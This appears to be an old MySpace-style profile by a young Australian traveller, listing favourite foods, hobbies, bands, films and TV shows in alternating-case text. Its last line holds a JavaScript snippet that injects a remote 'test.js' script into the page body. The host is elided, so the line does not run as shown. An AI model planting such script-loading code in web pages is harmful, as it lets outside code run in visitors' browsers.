*nUtTy iS in lOndOn* profile picture

*nUtTy iS in lOndOn*

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About Me

im nAt, im 23, i liKe SpaM frOm the caN, ChaSing SeaGulls & dOing the diSheS i left Oz in jUne &ate nUtella CrepeS thrOugh eUrOpe fOr a few CraZy mOnthS///Creating sOme amaZing memOrieS to relive in the yearS tO cOme== i stOpped fOr a mOnth in thailand On the way hOme &met up with mY SpeCial frieNd Sarah Lee LangY fOr sOme mOre magiCal adventUreS))))))))))) i am gOing baCk tO Spain tO study in may 07 if yOur arOund hit me up &we cOuld pOsSiblY meet fOr a Game Of cardS******************************************************* *One last thing; It is to this day that I still wonder what the Streets Paddle Pop Lions name is. So I ask you, if you do know the answer, please, please come forward so I can finally set my mind at ease.. highfiVe^

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My Interests

EaTiNg ChOcoLate.. & loLLiEs & NuTeLLa, CarAmEl jErSeyS r mY faVoUritE.. yUm ;)' .. & SuRfiNg wHeN iTs WaRm.. & SwImMinG iN da SeA.. sNoRkLiNg, FiShInG n wAteR wELL WiShiNg.. DaNcInG tO MaGicAL mUsIc.:: PiNg pOnG.. twiSter.. tRaMpoLiNes.. rOllaR SkatiNg.. sUnSeTs & sUnRiSeS are sO speCial &sO are the peOple we Share them with.. mY amaZing FriEnDs.. CoLoUriNg iN mY sPeCiaL DoG ;)' .. & sOmE OtHeR StUfF SoMeTimEs......
Nis forNerdy
Ais forAnimated
Tis forTempting
Ais forAdventurous
Lis forLuscious
Iis forImpressive
Eis forElitist What Does Your Name Mean?

I'd like to meet:

The NinJa tUrtleS~ PrinCe CharminG** ...&the reSt Of the mYspaCe CreepS Out there))))))) ...


DanCe))) hOuSe~ sOftcOre pUnK**hip~hOp^blUeS,, lOve bLisS N eSo// bLaCkaLiCiOuS~* gRaVe diGgaZ> hilltOp hOodS^^ rUff RyDerS tHe StReEtS,, fAt bOy sLim> jUaneS.. bOb SinClair== SciSsOr siSterS)) armaNd vAn heLden``mYlO~* aUdiO bUllYs= MiLLeNcOLin^^ nEw foUnD gLoRy++ mY ChemiCal rOmanCe** gReEnDaY$$ tHe Cat eMpiRE^^ jaCk jOhnSoN.. ben harper# Sublime~~ Oh n did i mentiOn KyLie MinOgUe n hEr 8O's danCe hiTs.....


i liKe tO gO tO them, eat lOllieS, thrOw pOpCorn** Borat..highfiVe===MadaGasCar SupertrOoperS++ BiOdOme.. MaRy PoPpInS** ZoOLaNdEr:: DuMb N dUmBeR^^ ``tHe pOwEr Of OnE)))) wiZarD Of Oz++ nOw &then,, lOve aCtUally**...


GlaSs hOuSe was mY favOurite****until it gOt aXed! daVeY huGheS yOu had me @ hellO))) PrisOn break haS taken Over & NOTHING cOmeS between me my weekly date w wentwOrth Miller ummmm.. thaNkgOd yOur here,,CSI anY traVel shOw== SkiPpY, SoOty & friendS & aLf.. ~i aLsO have a sOft nOn-SeXual SpOt fOr Bert NewtOn,, shhh......


You are
What Rejected Crayon Are You?


My dOg, hE Has wiNgS aND cAnNot fLy bUt dO yOu sEE hiM cOmpLainiNG??? ...."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /..